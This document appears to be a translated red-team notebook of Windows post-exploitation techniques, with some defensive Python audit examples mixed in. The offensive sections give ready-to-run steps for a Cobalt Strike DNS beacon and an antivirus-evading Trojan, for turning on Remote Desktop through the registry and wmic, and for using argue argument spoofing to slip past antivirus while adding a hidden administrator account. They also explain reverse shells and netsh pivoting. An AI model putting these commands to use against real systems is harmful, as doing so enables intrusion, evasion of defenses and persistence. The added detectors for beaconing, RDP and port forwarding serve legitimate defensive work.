1. Find the website path under Windows
Visit the website, note a file that it serves (for example a script referenced in the page source), then search the disk for that file name with dir /s /b:
dir /s /b c:\checkform.js
/S lists the files in the specified directory and all of its subdirectories.
/B uses bare format (no heading information or summary): for files only the file name and extension are shown, which is the more practical option here.
2. Determine whether the web server and the database are on separate hosts
3. Set up a DNS Beacon
- Prepare a VPS (our CS team server can be used directly); port 53 on that machine must be reachable from the Internet. Then prepare a domain name.
- Configure DNS records for the domain: create an A record and an NS record. The A record points to the VPS, and the NS record points to the A record's hostname.
- In CS, start a DNS Beacon listener: DNS Hosts is the NS record name, DNS Host (Stager) is the A record name.
- Generate the DNS Trojan with type Windows Executable(S). If antivirus flags the Trojan, generate shellcode first and then compile it yourself so that it evades the antivirus.
- Run the Trojan.
After uploading a Trojan that evades antivirus, execution succeeded. By default the new session comes online as a blank ("black frame") entry and commands cannot be executed.
Run the following two commands so that the session displays and executes commands normally:
checkin
mode dns-txt
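As the defender-side counterpart to dns-txt mode, here is an added example (not code from these notes) that flags clients making many TXT lookups for unique names under a single zone in a resolver log; the log format, the two-label zone extraction and the thresholds are assumptions.

```python
"""Heuristic detector for DNS TXT beaconing over resolver logs.
Added example, not code from the original notes. The log format, the
two-label zone extraction and the thresholds are assumptions."""
import re
from collections import defaultdict

# Constructed resolver log: one client talks to a C2 zone in dns-txt mode,
# another makes ordinary TXT lookups (DMARC/SPF style).
SAMPLE_LOG = """\
2024-05-01T10:00:01 src=10.0.0.5 qtype=A qname=www.example.org
2024-05-01T10:00:02 src=10.0.0.5 qtype=TXT qname=7a1f.post.c2-zone.test
2024-05-01T10:00:03 src=10.0.0.5 qtype=TXT qname=9b02.post.c2-zone.test
2024-05-01T10:00:04 src=10.0.0.5 qtype=TXT qname=c3d4.post.c2-zone.test
2024-05-01T10:00:05 src=10.0.0.5 qtype=TXT qname=e5f6.post.c2-zone.test
2024-05-01T10:00:06 src=10.0.0.5 qtype=TXT qname=a7b8.post.c2-zone.test
2024-05-01T10:00:07 src=10.0.0.7 qtype=TXT qname=_dmarc.example.org
2024-05-01T10:00:08 src=10.0.0.7 qtype=TXT qname=example.org
"""

LINE_RE = re.compile(r"src=(?P<src>\S+) qtype=(?P<qtype>\S+) qname=(?P<qname>\S+)")


def registered_domain(qname: str) -> str:
    """Last two labels of the name (assumption: no public-suffix list)."""
    return ".".join(qname.rstrip(".").lower().split(".")[-2:])


def find_txt_beaconing(log: str, min_txt: int = 5, min_unique: int = 4) -> dict:
    """Map (client, zone) -> (TXT query count, unique names) for pairs that
    exceed both thresholds; many unique names under one zone is the tell."""
    txt_count = defaultdict(int)
    names = defaultdict(set)
    for line in log.splitlines():
        m = LINE_RE.search(line)
        if not m or m["qtype"].upper() != "TXT":
            continue
        key = (m["src"], registered_domain(m["qname"]))
        txt_count[key] += 1
        names[key].add(m["qname"].lower())
    return {k: (txt_count[k], len(names[k])) for k in txt_count
            if txt_count[k] >= min_txt and len(names[k]) >= min_unique}
```

On real logs, pair the threshold with a time window so that a burst of unique names per minute, rather than a daily total, is what trips the rule.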
4. Open port 3389
Method 1: on Windows Server 2012 the command to enable port 3389 (Remote Desktop) is:
wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1
View the RDP port
Query the configured port with
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /V PortNumber
The returned PortNumber is 0xd3d, which is 3389 in decimal.
Windows Server 2003
On 1:
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
Off: REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 11111111 /f
(any non-zero fDenyTSConnections value denies connections; 1 is the conventional value)
On 2 (any of the following three):
1. wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
2. REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
3. REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Windows Server 2008
Set the RDP-Tcp port (0xd3d = 3389):
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f
Reference (original article): https://www.jianshu.com/p/8e7d2f78f5e1
Enable and query port 3389
Enable port 3389:
Works on all versions:
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
2003:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
2008:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
Multiple versions (Win08, Win03, Win7, Win2012, WinXP), run these three commands:
1. wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1
2. wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1
3. reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
Remote Desktop is enabled but you cannot find the port?
The quick and brutal way: see whether the server has a phone number or QQ contact lying around, get in touch with the administrator directly and ask why a perfectly good port 3389 had to be changed, did they think I would not find it?
Just kidding! That is a good way to get beaten up!
1. Run in cmd: REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
2. Run in cmd: tasklist /svc to find the PID of TermService, then look up the port bound to that PID in the output of netstat -ano
3. Look in the registry: the PortNumber value under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp
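The three lookups above can be scripted into an audit that confirms where RDP actually listens. Added example, not code from these notes: it parses constructed output of REG QUERY, tasklist /svc and netstat -ano, converting the hex PortNumber (0xd3d) to decimal and reporting the ports on which the TermService host process is listening.

```python
"""Audit helpers that locate the RDP listener from the output of the three
commands above (REG QUERY, tasklist /svc, netstat -ano). Added example, not
code from the original notes; the sample outputs below are constructed."""
import re

REG_QUERY_OUT = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
    PortNumber    REG_DWORD    0xd3d
"""

TASKLIST_OUT = """
Image Name                     PID Services
========================= ======== ============================================
svchost.exe                    812 Dhcp, EventLog
svchost.exe                   1396 TermService
"""

NETSTAT_OUT = """
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       812
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1396
  TCP    192.168.1.10:49700     192.168.1.20:445       ESTABLISHED     4
"""


def rdp_port_from_registry(reg_output: str) -> int:
    """REG QUERY prints REG_DWORD values in hex (0xd3d); return decimal."""
    m = re.search(r"PortNumber\s+REG_DWORD\s+(0x[0-9a-fA-F]+)", reg_output)
    if not m:
        raise ValueError("PortNumber not found in REG QUERY output")
    return int(m.group(1), 16)


def pid_of_service(tasklist_output: str, service: str) -> int:
    """PID of the process hosting `service` in `tasklist /svc` output."""
    for line in tasklist_output.splitlines():
        m = re.match(r"\S+\s+(\d+)\s+(.+)$", line.strip())
        if m and service in [s.strip() for s in m.group(2).split(",")]:
            return int(m.group(1))
    raise LookupError(f"{service} is not running")


def listening_ports_for_pid(netstat_output: str, pid: int) -> set:
    """TCP ports in LISTENING state owned by `pid` in `netstat -ano` output."""
    ports = set()
    for line in netstat_output.splitlines():
        cols = line.split()
        if len(cols) == 5 and cols[0] == "TCP" and cols[3] == "LISTENING" and int(cols[4]) == pid:
            ports.add(int(cols[1].rsplit(":", 1)[1]))
    return ports
```

A mismatch between the registry value and the live listening port is worth investigating, since the registry is the usual place an attacker changes the port after enabling RDP.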
5. Use argue (argument spoofing) to bypass antivirus software when adding users
argue: argument pollution (spoofing)
Requires administrator or SYSTEM privileges
Usage:
argue [command] [fake arguments]
argue [command] [fake arguments] registers the fake (polluted) arguments for that command
Use argue to pollute the arguments of the net1 program (note: net1, not net, because net still passes the real arguments on to net1)
argue net1 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Run argue to view the polluted arguments, then perform the add-user operation through the polluted net1:
execute net1 user hack Root111! /add
execute net1 localgroup administrators hack /add
Using argue to pollute the arguments of powershell.exe
Running powershell.exe directly is blocked
argue powershell.exe xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Run argue again to check the pollution results
execute powershell.exe then runs without being intercepted (shell commands will still not succeed, because shell is essentially cmd.exe /c arguments)
References:
http://www.0x3.biz/archives/837.html
https://mp.weixin.qq.com/s/dVOBHSWGDUcxnC8g0NWEAg
6. reverse_tcp and bind_tcp
Difference:
[reverse_tcp]
attacker -> [contact me at the port 4444] -> victim
after the payload is executed
attacker <-> [port 4444] <-> victim
[bind_tcp]
attacker -> [open the way for me in the port 4444] -> victim
after execution
attacker <-> [port 4444] <-> victim
reverse_tcp: the attacker sets a port (LPORT) and IP (LHOST). The payload runs on the victim machine and connects out to that port on the attacker's IP; if the attacker is listening on the port, it sees the target connect in.
bind_tcp: the attacker sets a port (LPORT); the payload runs on the target and opens (listens on) that port so the attacker can connect to it.
The reverse method is generally safer: because the target connects out to the attacker, it is usually not caught by the firewall, whereas bind is easily noticed by security software and firewalls when the target opens a listening port.
If the target machine can reach the Internet, use reverse_tcp and let the target connect back to our server to establish the connection.
bind_tcp is used when the target machine is in an intranet and cannot reach the Internet: open a port on the target that cannot get out, and the attacker connects to it through a forwarded route.
Reference (original article): https://blog.csdn.net/adidala/article/details/24117711
7. netsh port forwarding
1. Add a port forwarding rule:
First open a command prompt (cmd).
netsh interface portproxy add v4tov4 listenport=<listening port> connectaddress=<address forwarded to> connectport=<port forwarded to>
Example: netsh interface portproxy add v4tov4 listenport=9988 connectaddress=192.168.88.110 connectport=9988
2. Check which ports are forwarded
netsh interface portproxy show all
3. Delete a forwarding rule
netsh interface portproxy delete v4tov4 listenaddress=192.168.88.110 listenport=9988
(listenaddress must match the rule as it was added; a rule added without listenaddress, as in the example above, is deleted with listenport=9988 alone.)
Reference (original article): https://blog.csdn.net/hx7013/article/details/79786407
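portproxy rules persist across reboots and are a common pivot and persistence artifact, so an audit that parses netsh interface portproxy show all is worth having. Added example, not code from these notes: the sample output is constructed, the parser assumes the four-column table layout the command prints, and for each rule it builds the matching delete command (listenaddress omitted for rules shown with '*').

```python
"""Audit of `netsh interface portproxy show all` output. Added example, not
code from the original notes; the sample output is constructed and the parser
assumes the four-column "Listen on ipv4 / Connect to ipv4" table layout."""
import ipaddress
from dataclasses import dataclass

SHOW_ALL_OUT = """
Listen on ipv4:             Connect to ipv4:
Address         Port        Address         Port
--------------- ----------  --------------- ----------
*               9988        192.168.88.110  9988
127.0.0.1       8443        127.0.0.1       443
"""


@dataclass(frozen=True)
class Rule:
    listen_addr: str
    listen_port: int
    connect_addr: str
    connect_port: int

    def delete_command(self) -> str:
        """netsh delete command; listenaddress omitted when shown as '*'."""
        cmd = f"netsh interface portproxy delete v4tov4 listenport={self.listen_port}"
        if self.listen_addr != "*":
            cmd += f" listenaddress={self.listen_addr}"
        return cmd


def parse_portproxy(output: str) -> list:
    """Rows with four columns whose port columns are numeric are rules."""
    rules = []
    for line in output.splitlines():
        cols = line.split()
        if len(cols) == 4 and cols[1].isdigit() and cols[3].isdigit():
            rules.append(Rule(cols[0], int(cols[1]), cols[2], int(cols[3])))
    return rules


def offhost_rules(rules: list) -> list:
    """Rules relaying traffic to another host (the pivoting pattern); a
    hostname that does not parse as an address counts as off-host."""
    def is_loopback(addr):
        try:
            return ipaddress.ip_address(addr).is_loopback
        except ValueError:
            return False
    return [r for r in rules if not is_loopback(r.connect_addr)]
```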
8. Running a program in the background on Linux
nohup and & are both ways to run a command in the background: & runs it in the background of the current shell, while nohup additionally keeps it running after the terminal session closes (the two are commonly combined as nohup command &).